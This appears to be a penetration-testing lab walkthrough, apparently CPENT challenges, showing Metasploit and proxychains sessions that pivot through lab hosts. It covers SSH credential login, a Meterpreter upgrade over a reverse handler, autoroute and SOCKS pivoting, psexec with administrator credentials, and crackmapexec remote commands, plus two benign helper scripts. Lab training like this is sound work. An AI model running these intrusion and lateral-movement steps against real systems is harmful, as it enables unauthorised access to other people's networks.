The authenticity of host '192.168.200.6 (192.168.200.6)' can't be established.
ECDSA key fingerprint is SHA256:Qrsxh/VOOuYPH6Lk5h3T8TuOEEs544mmxniMPJ4wflc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.200.6' (ECDSA) to the list of known hosts.
kali@192.168.200.6's password:
Linux kali 6.1.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.20-2kali1 (2023-04-18) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 1 03:06:12 2023 from 192.168.18.173
┌──(kali㉿kali)-[~]
└─$ sudo -i
Success: nmap can now scan .5.100:
┌──(root㉿kali)-[~]
└─# proxychains nmap -Pn -sT -n -p135,139,445 192.168.5.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 08:41 EDT
[proxychains] Dynamic chain ... 127.0.0.1:9051 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9051 ... 192.168.5.100:139 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9051 ... 192.168.5.100:445 ... OK
Nmap scan report for 192.168.5.100
Host is up (0.092s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
192.168.5.230 can be scanned the same way:
┌──(root㉿kali)-[~]
└─# proxychains nmap -Pn -n -sT -p22 192.168.5.230
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 08:56 EDT
[proxychains] Dynamic chain ... 127.0.0.1:9051 ... 192.168.5.230:22 ... OK
Nmap scan report for 192.168.5.230
Host is up (0.037s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
6. Challenge 45: (50 Points)
What are the last 6 characters of the ssh ECDSA private key on the 192.168.5.230 machine?
Since .5.230 only has the SSH port open, it comes down to brute force, but the wordlist does not seem to contain the credentials.
Double pivoting
After entering the new session created above, repeat the same steps to build a double pivot. To be thorough, the following walks through everything from .65.200 onward, from the first pivot all the way to the double pivot.
The only host the attacker machine can reach at the start is 172.16.65.200; it is dual-homed with .5.200, so first establish a session on it and add the .5 segment to the routing table:
msf6 > use scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.65.200
rhosts => 172.16.65.200
msf6 auxiliary(scanner/ssh/ssh_login) > set username vagrant
username => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set password vagrant
password => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.65.200:22 - Starting bruteforce
[+] 172.16.65.200:22 - Success: 'vagrant:vagrant' 'uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner) Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.200.6:34219 -> 172.16.65.200:22) at 2023-05-11 21:51:35 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.200.6:34219 -> 172.16.65.200:22 (172.16.65.200)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.200.6:4433
[*] Sending stage (1017704 bytes) to 172.16.65.200
[*] Meterpreter session 2 opened (192.168.200.6:4433 -> 172.16.65.200:52490) at 2023-05-11 21:51:59 -0400
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run autoroute -s 192.168.5.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.5.0/255.255.255.0...
[+] Added route to 192.168.5.0/255.255.255.0 via 172.16.65.200
[*] Use the -p option to list all active routes
meterpreter > bg
[*] Backgrounding session 2...
Next, configure proxychains so that the .5 segment can be reached without going through msf. First set up the msf side:
msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 1080 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set srvport 9010
srvport => 9010
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
Next, open another terminal:
┌──(root㉿kali)-[~]
└─# vim /etc/proxychains4.conf
The contents are the same as shown earlier, except that the last line is
socks4 127.0.0.1 9010
If there are other lines of the form socks <IP> <Port> above it, comment them out or delete them to avoid confusion: with dynamic_chain every live proxy in the list is chained in order, and a dead one only adds a timeout before the real pivot is tried.
With that in place the .5 segment is reachable; below is a test scan of .5:
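Both the 9051 note above (the ssh -R variant) and this step come down to the same chore: leaving exactly one live line under [ProxyList] whenever the pivot changes. The shell script below is an added example, not from the original notes. It comments out every existing proxy line, appends the one you want, and lists what is active; the function names set_proxy and active_proxies are chosen here, and the demo at the bottom works on a constructed copy of the config rather than on /etc/proxychains4.conf itself. When switching pivots for real, run set_proxy /etc/proxychains4.conf socks4 127.0.0.1 9010 (or 9051 for the ssh -D/-R tunnel).

```shell
#!/usr/bin/env bash
# Added example: keep exactly one live proxy in a proxychains4.conf.
# With dynamic_chain every reachable entry under [ProxyList] is chained in
# order, so a stale line (an old msf listener, the default tor entry) either
# adds an extra hop or costs a connect timeout on every socket.
set -eu

# Print the active (uncommented) proxy lines below [ProxyList].
active_proxies() {
    awk '/^\[ProxyList\]/ { inlist = 1; next }
         inlist && /^[ \t]*(socks4|socks5|http)[ \t]/' "$1"
}

# set_proxy CONF TYPE IP PORT: comment out every existing proxy line and
# append the new one, so the chain has a single hop.
set_proxy() {
    conf=$1
    ptype=$2
    pip=$3
    pport=$4
    case "$ptype" in
        socks4|socks5|http) ;;
        *) echo "unsupported proxy type: $ptype" >&2; return 1 ;;
    esac
    tmp=$(mktemp)
    awk '/^\[ProxyList\]/ { inlist = 1; print; next }
         inlist && /^[ \t]*(socks4|socks5|http)[ \t]/ { print "#" $0; next }
         { print }' "$conf" > "$tmp"
    printf '%s %s %s\n' "$ptype" "$pip" "$pport" >> "$tmp"
    mv "$tmp" "$conf"
}

# Constructed demo: a config carrying the three lines from the earlier setup,
# switched over to the ssh -D listener forwarded to 127.0.0.1:9051.
demo_conf=$(mktemp)
printf '%s\n' 'dynamic_chain' '[ProxyList]' \
    'socks4 127.0.0.1 20000' 'socks5 127.0.0.1 8090' 'socks4 172.16.253.22 9010' \
    > "$demo_conf"
set_proxy "$demo_conf" socks4 127.0.0.1 9051
echo "active proxy lines after set_proxy:"
active_proxies "$demo_conf"
rm -f "$demo_conf"
```

The awk filter only treats lines after the [ProxyList] header as proxy entries, so the commented examples in the top half of the file (socks5 192.168.67.78 1080 and friends) are left alone.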
┌──(root㉿kali)-[~]
└─# proxychains nmap 192.168.5.100 -sT -n -Pn -sC -sV -p445 --disable-arp-ping
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 21:55 EDT
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:46946 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:24034 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
Nmap scan report for 192.168.5.100
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7600 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::-
| Computer name: WIN-6HAVIPITA2C
| NetBIOS computer name: WIN-6HAVIPITA2C\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-05-11T18:55:22-07:00
|_clock-skew: mean: 2h20m00s, deviation: 4h02m32s, median: -1s
| smb2-time:
| date: 2023-05-12T01:55:18
|_ start_date: 2021-12-24T09:07:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds
Next, break into the .5 host:
msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.5.100
rhosts => 192.168.5.100
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass Pa$$w0rd123
smbpass => Pa$$w0rd123
msf6 exploit(windows/smb/psexec) > set smbshare C$
smbshare => C$
msf6 exploit(windows/smb/psexec) > set lport 4460
lport => 4460
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.5.100:445 - Connecting to the server...
[*] 192.168.5.100:445 - Authenticating to 192.168.5.100:445 as user 'administrator'...
[*] 192.168.5.100:445 - Selecting PowerShell target
[*] 192.168.5.100:445 - Executing the payload...
[+] 192.168.5.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.5.100:4460
[*] Sending stage (175686 bytes) to 192.168.5.100
[*] Meterpreter session 3 opened (192.168.5.200:51578 -> 192.168.5.100:4460 via session 2) at 2023-05-11 21:58:56 -0400
meterpreter > sessions -l
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(windows/smb/psexec) > sessions -l
Active sessions
===============
Id  Name  Type                     Information                             Connection
--  ----  ----                     -----------                             ----------
1         shell linux              SSH root @                              192.168.200.6:34219 -> 172.16.65.200:22 (172.16.65.200)
2         meterpreter x86/linux    vagrant @ 172.16.65.200                 192.168.200.6:4433 -> 172.16.65.200:52490 (172.16.65.200)
3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-6HAVIPITA2C   192.168.5.200:51578 -> 192.168.5.100:4460 via session 2 (192.168.5.100)
Because .5.100 also has a NIC on the .35 network, enter its interactive session and add that route as well:
msf6 exploit(windows/smb/psexec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > run autoroute -s 192.168.35.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.35.0/255.255.255.0...
[+] Added route to 192.168.35.0/255.255.255.0 via 192.168.5.100
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.5.0 255.255.255.0 Session 2
192.168.35.0 255.255.255.0 Session 3
After that, open another window and scan the .35 subnet directly from the attacking machine. Related questions:
4. Challenge 43: (50 Points)
What is the domain NAME of the machine at IP address 192.168.35.100?
Ans: CPENT.LOCALNET
5. Challenge 44: (50 Points)
What is the NetBIOS 16th Byte with the type of UNIQUE on the machine at the 192.168.35 network? (Hint: starts with 1)
Ans: 1D
┌──(root㉿kali)-[~]
└─# proxychains nmap -Pn -sT -sC -sV -p445 192.168.35.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 02:22 EDT
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:51711
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:33501
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
Nmap scan report for 192.168.35.100
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: CPENT.LOCALNET)
Service Info: Host: TARGETTHREE
Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m04s, median: -2s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: ubuntu
| NetBIOS computer name: TARGETTHREE\x00
| Domain name: \x00
| FQDN: ubuntu
|_ System time: 2023-04-22T14:22:54+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-22T06:22:50
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap
Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds
┌──(root㉿kali)-[~]
└─# proxychains nbtscan 192.168.35.100 -v
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Doing NBT name scan for addresses from 192.168.35.100
Question 4 can be answered from a scan of port 445, so scan that IP and port directly; the answer sits to the right of "workgroup". Question 5 is answered by using the known SMB credentials with crackmapexec to query 192.168.35.100 remotely; the output below shows that the answer is 1D.
┌──(root㉿kali)-[~]
└─# proxychains4 crackmapexec smb -d . -u administrator -p 'Pa$$w0rd123' -x "cmd.exe /c nbtstat -A 192.168.35.100" 192.168.5.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:135 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [*] Windows Server 2008 R2 Standard 7600 x64 (name:WIN-6HAVIPITA2C) (domain:.) (signing:False) (SMBv1:True)
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:445 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [+] .\administrator:Pa$$w0rd123 (Pwn3d!)
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:49155 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [+] Executed command
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Local Area Connection 2:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Node IpAddress: [192.168.35.3] Scope Id: []
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C NetBIOS Remote Machine Name Table
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Name Type Status
SMB 192.168.5.100 445 WIN-6HAVIPITA2C ---------------------------------------------
SMB 192.168.5.100 445 WIN-6HAVIPITA2C TARGETTHREE <00> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C TARGETTHREE <03> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C TARGETTHREE <20> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C ..__MSBROWSE__.<01> GROUP Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <00> GROUP Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <1D> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <1E> GROUP Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C MAC Address = 00-00-00-00-00-00
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Local Area Connection:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Node IpAddress: [192.168.5.100] Scope Id: []
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Host not found.
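The nbtscan attempt above returns nothing because nbtscan queries UDP/137 and neither proxychains nor a SOCKS4 proxy carries UDP, which is why nbtstat is run on the pivot host instead. As an added Python example (not part of the original post), the following parses that crackmapexec-relayed nbtstat table and decodes the well-known NetBIOS suffixes, so the <1D> UNIQUE entry can be read off programmatically; the sample lines are constructed from the output above.

```python
"""Parse an 'nbtstat -A' name table and decode NetBIOS name suffixes.
Added example, not part of the original post; input lines may carry the
'SMB <ip> <port> <host>' prefix that crackmapexec adds, which is stripped."""
import re
from typing import Dict, List, Tuple

Row = Tuple[str, str, str, str]  # (name, suffix, UNIQUE|GROUP, status)
# Well-known 16th-byte suffixes (RFC 1001/1002 and Microsoft usage).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "workstation service (host name)",
    ("03", "UNIQUE"): "messenger service",
    ("20", "UNIQUE"): "file server service",
    ("1B", "UNIQUE"): "domain master browser",
    ("1D", "UNIQUE"): "master browser for the subnet",
    ("00", "GROUP"): "domain/workgroup name",
    ("01", "GROUP"): "master browser announcement (__MSBROWSE__)",
    ("1E", "GROUP"): "browser service elections",
}
ROW_RE = re.compile(r"(\S+?)\s*<([0-9A-F]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")
CME_PREFIX = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+")


def parse_name_table(text: str) -> List[Row]:
    """Return every (name, suffix, type, status) row found in the text."""
    rows = []
    for raw in text.splitlines():
        m = ROW_RE.search(CME_PREFIX.sub("", raw, count=1))
        if m:
            rows.append(m.groups())
    return rows


def unique_suffixes_for(rows: List[Row], name: str) -> List[str]:
    """Suffixes registered with type UNIQUE for the given name."""
    return [s for n, s, t, _ in rows if n == name and t == "UNIQUE"]


def describe(rows: List[Row]) -> Dict[str, str]:
    """Map 'NAME<xx>' to the meaning of its suffix/type combination."""
    return {f"{n}<{s}>": SUFFIX_MEANING.get((s, t), "unknown") for n, s, t, _ in rows}


# Constructed sample, shaped like the crackmapexec-relayed output above.
SAMPLE = """\
SMB 192.168.5.100 445 WIN-6HAVIPITA2C TARGETTHREE <00> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C TARGETTHREE <20> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C ..__MSBROWSE__.<01> GROUP Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <00> GROUP Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <1D> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <1E> GROUP Registered
"""
```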